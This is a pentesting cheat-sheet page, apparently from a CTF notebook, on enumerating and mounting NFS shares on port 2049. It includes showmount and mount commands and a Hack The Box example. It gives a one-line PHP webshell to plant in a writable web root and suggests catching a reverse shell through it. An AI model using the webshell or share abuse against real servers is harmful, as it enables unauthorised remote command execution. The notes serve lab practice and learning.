Skip to content

Latest commit

 

History

History
90 lines (60 loc) · 2.4 KB

2049-nfs.md

File metadata and controls

90 lines (60 loc) · 2.4 KB
description
Network File System (NFS) is a file system protocol that allows a user on a client system to access files stored on a file server.

📂 2049/NFS

Enumeration

  • Open NFS’s work by utilizing read/write access permissions.
    • Read Access: Possible confidential file is available
    • Write Access: Possible file upload to execute through web service

Useful Nmap Scripts 

nfs-ls #List NFS exports and check permissions
nfs-showmount #Like showmount -e
nfs-statfs #Disk statistics and info from NFS share

Mounting

To know which folder has the server available to mount you an ask it using:

showmount -e <IP>

Then mount it using:

mount -t nfs [-o vers=2] <ip>:<remote_folder> <local_folder> -o nolock

You should specify to use version 2 because it doesn't have any authentication or authorization.

Example:

Enumerate share:

showmount -e 10.10.10.10
Export list for 10.10.10.10:
/site_backups (everyone)

Create directory for mount point:

sudo mkdir /mnt/HTB_Site_Backups

Mount the share to newly created mount point:

sudo mount -t nfs 10.10.10.10:/site_backups /mnt/HTB_Site_Backups/ -o nolock

Exploitation Tips

  • When you mount a directory, be sure to check the directory for it's permissions
  • The mounted directory does not check the user, it simply checks it's permissions
  • This means that if you create a user with the same permissions set, you will be able to read, write, or execute those files found within those directories
  • Perhaps there's a web server running on that server and a mounted directory is /var/www/html, well if you can write to it, place a PHP webshell in there, and gain access to the server!

PHP Webshell

  • An extremely simple PHP Webshell
  • To use, simple name the file shell.php and place it in /var/www/html
<?php system($_GET['cmd']);?>
  • Navigate to hackthebox.htb/shell.php?cmd=<reverse shell here>
  • I always found the most consistent way to catch a reverse shell is with the nc mkfifo reverse shell

Tools:

Mount: For mounting share availability

Showmount: For finding shares available

References

{% embed url="https://book.hacktricks.xyz/network-services-pentesting/nfs-service-pentesting" %}

{% embed url="https://jamespatricksec.medium.com/enumerating-and-exploiting-nfs-1571cb484e16" %}